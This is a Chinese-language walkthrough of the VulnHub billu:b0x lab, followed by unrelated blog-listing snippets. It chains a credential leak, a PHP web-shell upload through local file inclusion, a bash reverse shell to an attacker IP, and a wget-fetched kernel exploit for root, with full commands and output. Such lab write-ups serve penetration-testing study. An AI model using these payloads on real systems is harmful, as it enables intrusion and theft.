知识点

SQLi、目录爆破、数据库操作、文件包含漏洞、提权、反弹shell

解题步骤

nmap扫描有80,22端口

nmap -sV -Pn -T 4 192.168.220.132

访问网页提示sqli,使用万能注入admin' or 'a'='a --,返回js弹窗,可能无法注入

御剑扫描目录有test.phpindex.phpc.phpshow.phpin.php

尝试下载文件

发现调用函数file_download($_POST['file']);下载文件,即在test.php页面通过传入file的文件名,可以下载对应的文件。

将其他php文件下载下来,发现c.php文件中包含了mysql的账户密码

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

访问192.168.220.132/phpmyadmin输入账户密码,成功进入

在ica表的auth列中找到后台登录账户和密码

登录index.php,进入http://192.168.220.132/panel.php,发现有show User和Add User,分别对应数据库user表和add.php的样式

添加用户,可以正常上传

右键图片有图片地址,进入查看

在panel.php源码中查看到可能存在本地文件包含漏洞

	if($choice==='add')

	{

       		include($dir.'/'.$choice.'.php');

			die();

	}

        if($choice==='show')

	{

		include($dir.'/'.$choice.'.php');

		die();

	}

	else

	{

		include($dir.'/'.$_POST['load']);

	}

在一个图片后面上传cmd马<?php system($_GET['cmd']); ?>并上传

在panel.php点击continue,修改load位置为上传的图片load=/uploaded_images/1.jpg&continue=continue

成功得到回显

POST /panel.php?cmd=cat%20/etc/passwd;ls查看用户

利用bash反弹shell

echo "bash -i >& /dev/tcp/192.168.220.154/4444 0>&1" | bash

需要转为url

burp发送

监听成功

┌──(root㉿kali)-[/home/kali/桌面]

└─# nc -nvlp 4444

listening on [any] 4444 ...

connect to [192.168.220.154] from (UNKNOWN) [192.168.220.132] 58490

bash: no job control in this shell

www-data@indishell:/var/www$

查看系统内核版本,为ubuntu12.04

cat /etc/issue

本地提权漏洞

https://www.exploit-db.com/exploits/37292/

由于菜刀连接失败,使用python开启http服务

python -m http.server 80

在靶机上请求下载

www-data@indishell:/var/www/uploaded_images$ wget http://192.168.220.154/37292.c

</uploaded_images$ wget http://192.168.220.154/37292.c

--2022-04-21 10:50:23--  http://192.168.220.154/37292.c

Connecting to 192.168.220.154:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 5119 (5.0K) [text/x-csrc]

Saving to: `37292.c'

     0K ....                                                  100% 3.50M=0.001s

2022-04-21 10:50:23 (3.50 MB/s) - `37292.c' saved [5119/5119]

下载完成后赋权编译运行

chmod 777 37292.c

gcc 37292.c -o exp

./exp

提权完毕

# id

uid=0(root) gid=0(root) groups=0(root),33(www-data)

vulnhub billu:b0x的更多相关文章

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. Billu_b0x内网渗透-vulnhub

    个人博客:点我 本次来试玩一下vulnhub上的Billu_b0x,只有一个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题.靶场 ...

  3. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  4. Vulnhub Billu_b0x

    1.信息收集 1.1.获取IP地址: map scan report for 192.168.118.137 Host is up (0.00017s latency). Not shown: 998 ...

  5. Vulnhub Breach1.0

    1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...

  6. Vulnhub靶场渗透练习(二) Billu_b0x

    运行虚拟机直接上nmap扫描 获取靶场ip nmap 192.168.18.* 开放端口 TCP 22 SSH OpenSSH 5.9p1 TCP 80 HTTP Apache httpd 2.2.2 ...

  7. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

  8. HA: ISRO Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...

  9. LAMPSecurity: CTF6 Vulnhub Walkthrough

    镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...

  10. Hacker Fest: 2019 Vulnhub Walkthrough

    靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...

随机推荐

  1. node使用react项目启动错误TSError: ⨯ Unable to compile TypeScript:

    1.错误内容 return new TSError(diagnosticText, diagnosticCodes) ^ TSError: ⨯ Unable to compile TypeScript ...

  2. 安装Nodejs,执行npm命令异常

    异常现象: 在安装完成Nodejs之后,使用npm install时提示异常: 使用cmd查看npm版本,也报同样的错误. "operation not permitted, mkdir ' ...

  3. NOIP 2021 备战计划

    NOIP 2021 备战计划 复习知识点: 加粗表示一定去复习,?表示很可能不需要 线段树.树状数组:无论最近写多少遍都要去好好复习 Dij.SPFA:理由同上 大DP:哪个不重要? 门类:线性DP. ...

  4. 【Azure 存储服务】使用 AppendBlobClient 对象实现对Blob进行追加内容操作

    问题描述 在Azure Blob的官方示例中,都是对文件进行上传到Blob操作,没有实现对已创建的Blob进行追加的操作.如果想要实现对一个文件的多次追加操作,每一次写入的时候,只传入新的内容? 问题 ...

  5. 2022-05-05:给定一个正数num,要返回一个大于num的数,并且每一位和相邻位的数字不能相等. 返回达标的数字中,最小的那个。 来自微软。

    2022-05-05:给定一个正数num,要返回一个大于num的数,并且每一位和相邻位的数字不能相等. 返回达标的数字中,最小的那个. 来自微软. 答案2022-05-05: 从左往右看,是否有相邻两 ...

  6. 2021-12-04:公交路线。给你一个数组 routes ,表示一系列公交线路,其中每个 routes[i] 表示一条公交线路,第 i 辆公交车将会在上面循环行驶。 例如,路线 routes[0]

    2021-12-04:公交路线.给你一个数组 routes ,表示一系列公交线路,其中每个 routes[i] 表示一条公交线路,第 i 辆公交车将会在上面循环行驶. 例如,路线 routes[0] ...

  7. vue全家桶进阶之路48:Vue3 跨域配置devServer的参数和设置

    devServer 是一个用于配置开发服务器的选项对象.它可以用来配置服务器的各种选项,例如代理,端口号,HTTPS 等. 以下是一些常用的 devServer 参数和设置: port:指定开发服务器 ...

  8. pycharm报错提示:无法加载文件\venv\Scripts\activate.ps1,因为在此系统上禁止运行脚本。

    pycharm报错提示:无法加载文件\venv\Scripts\activate.ps1,因为在此系统上禁止运行脚本. 解决办法 1.终端输入get-executionpolicy,回车返回Restr ...

  9. 解密Prompt7. 偏好对齐RLHF-OpenAI·DeepMind·Anthropic对比分析

    前三章都围绕指令微调,这一章来唠唠RLHF.何为优秀的人工智能?抽象说是可以帮助人类解决问题的AI, 也可以简化成3H原则:Helpful + Honesty + Harmless.面向以上1个或多个 ...

  10. 使用a标签下载**.txt文件, 而不是直接打开

    今天有个使用a标签下载一个 .txt 文件,但是使用了不少方法,在点击下载的时候总是会直接打开被下载的文件,但是下载其他格式的文件就不会:也在网上找了不少资料 一.尝试href + download方 ...